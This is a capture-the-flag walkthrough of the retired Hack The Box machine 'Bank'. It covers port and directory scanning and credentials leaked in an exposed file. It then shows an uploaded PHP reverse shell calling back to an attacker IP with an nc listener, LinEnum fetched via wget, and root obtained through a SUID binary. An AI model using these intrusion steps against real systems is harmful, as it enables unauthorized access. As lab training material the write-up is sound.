Write-up for retired machine “Bank” on hackthebox.eu . Its a machine running Linux with IP adress: 10.10.10.29 .
Lets start by running a NMAP scan and see what ports are open.
nmap -T4 -A -p- -v 10.10.10.29
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-25 15:45 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Initiating NSE at 15:45
Completed NSE at 15:45, 0.00s elapsed
Initiating Ping Scan at 15:45
Scanning 10.10.10.29 [ 4 ports]
Completed Ping Scan at 15:45, 0.07s elapsed ( 1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 1.01s elapsed
Initiating SYN Stealth Scan at 15:45
Scanning 10.10.10.29 [ 65535 ports]
Discovered open port 22/tcp on 10.10.10.29
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Completed SYN Stealth Scan at 15:45, 14.48s elapsed ( 65535 total ports)
Initiating Service scan at 15:45
Scanning 3 services on 10.10.10.29
Completed Service scan at 15:46, 6.08s elapsed ( 3 services on 1 host)
Initiating OS detection ( try #1) against 10.10.10.29
Retrying OS detection ( try #2) against 10.10.10.29
Retrying OS detection ( try #3) against 10.10.10.29
Retrying OS detection ( try #4) against 10.10.10.29
Retrying OS detection ( try #5) against 10.10.10.29
Initiating Traceroute at 15:46
Completed Traceroute at 15:46, 0.02s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:46
Completed Parallel DNS resolution of 2 hosts. at 15:46, 1.01s elapsed
NSE: Script scanning 10.10.10.29.
Initiating NSE at 15:46
Completed NSE at 15:46, 8.20s elapsed
Initiating NSE at 15:46
Completed NSE at 15:46, 0.10s elapsed
Initiating NSE at 15:46
Completed NSE at 15:46, 0.01s elapsed
Nmap scan report for 10.10.10.29
Host is up ( 0.024s latency) .
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 ( Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 ( DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 ( RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 ( ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 ( ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 ( Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 (( Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.7 ( Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
With the NMAP scan we found de following open ports.
22 SSH
53 DNS
80 Apache webserver
When we visit 10.10.10.29 in Firefox we get the default Apache webserver page.
So with some guessing work we will use the machines name followed by .htb (bank.htb) and bind it to 10.10.10.29 in the /etc/hosts file.
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.29 bank.htb
Now when we visit bank.htb we get a login page. At first glance default user and passwords won’t work and nothing useful in de page source so we have to dig a little deeper.
Lets run dirsearch to see if we can find more directories.
I used dirbusters medium wordlist for this search.
python3 ./dirsearch.py -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -e php -u http://bank.htb -t 20
_|. _ _ _ _ _ _|_ v0.3.9
( _||| _) ( /_( _|| ( _| )
Extensions: php | HTTP method: get | Threads: 20 | Wordlist size: 441041
Target: http://bank.htb
[ 05:29:19] Starting:
[ 05:29:19] 403 - 279B - /.php
[ 05:29:19] 302 - 7KB - /index.php -> login.php
[ 05:29:20] 200 - 2KB - /login.php
[ 05:29:20] 302 - 3KB - /support.php -> login.php
[ 05:29:20] 403 - 281B - /icons/
[ 05:29:21] 403 - 283B - /uploads/
[ 05:29:22] 200 - 2KB - /assets/
[ 05:29:46] 302 - 0B - /logout.php -> index.php
[ 05:30:15] 200 - 1KB - /inc/
[ 05:45:48] 403 - 289B - /server-status/
[ 05:56:50] 200 - 248KB - /balance-transfer/
Task Completed
http://bank.htb/balance-transfer show a number of records with encrypted credentials.
Among all the records we see a significant smaller file compared to the rest.
Opening 68576f20e9732f1b2edc4df5b8533230.acc we see usable credentials which we will use to login.
--ERR ENCRYPT FAILED
+================= +
| HTB Bank Report |
+================= +
=== UserAccount ===
Full Name: Christos Christopoulos
Email: [email protected]
Password: ! ##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
=== UserAccount ===
Exploitation
On the support page we can upload a malicious php file. I used the php reverse shell by pentestmonkey
Change the ip, port and rename the malicious php file extension to .htb
$ip = '10.10.10.1' ; // CHANGE THIS
$port = 1234; // CHANGE THIS
Start a nc -nvlp 1234 listener for the reverse shell and now upload the .htb file.
Open the attachment in the ticket and voila we got a shell.
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
23:42:15 up 12:05, 0 users , load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid = 33( www-data) gid = 33( www-data) groups = 33( www-data)
/bin/sh: 0: can't access tty; job control turned off
$
User
Since we’re www-data the user.txt can be located in /home/chris.
$ ls -l /home/chris
total 4
-r--r--r-- 1 chris chris 33 May 29 2017 user.txt
Root
To get root we use LinEnum
Use pythons SimpleHTTPServer and wget the LinEnum.sh file to the /var/www/bank dir and run it.
Analysing the report the emergency file stands out from the rest.
-rwsr-xr-x 1 root root 112204 Jun 14 2017 /var/htb/bin/emergency
If we run it in nc nothing seems to happen, but id now shows euid=0(root) groups=0(root) .
cd /var/htb/bin
$ ./emergency
id
uid = 33( www-data) gid = 33( www-data) euid = 0( root) groups = 0( root) ,33( www-data)
So now we can get the root.txt in the /root/ dir and we’re done.